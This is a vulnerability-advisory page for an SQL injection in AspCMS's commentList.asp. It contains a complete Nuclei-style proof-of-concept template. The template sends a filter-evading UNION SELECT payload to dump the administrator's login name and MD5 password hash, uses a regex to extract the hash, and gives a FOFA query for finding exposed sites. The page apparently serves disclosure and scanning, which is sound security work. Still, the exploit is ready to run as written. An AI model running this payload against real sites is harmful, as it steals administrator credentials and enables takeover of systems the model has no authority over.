aspcms-commentlist-sqli: AspCMS commentList.asp - SQL Injection

日期: 2025-08-01 | 影响软件: AspCMS | POC: 已公开

漏洞描述

An SQL injection vulnerability has been identified in the commentList.asp file of AspCMS. Exploiting this vulnerability, an attacker can illicitly acquire the administrator's MD5 password.

PoC代码[已公开]

id: aspcms-commentlist-sqli

info:
  name: AspCMS commentList.asp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    An SQL injection vulnerability has been identified in the commentList.asp file of AspCMS. Exploiting this vulnerability, an attacker can illicitly acquire the administrator's MD5 password.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/cms/AspCMS/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="ASPCMS"
  tags: aspcms,sqli,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user"

    extractors:
      - type: regex
        name: admin_password
        group: 1
        regex:
          - "<div class=\"line2\">(.*?)</div>"
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "contains(body,'clistbox') && contains(body,'UserID,GroupID,LoginName,Password')"
        condition: and
# digest: 4a0a0047304502201b40b745c680bc5d214864092a46a54a4c13d6164365f5e8d5d26011a2bb1173022100d3042c64a4e820f96cb201dff4f63ded2d52d5834f74ddf240a27eb1efd7b5f8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐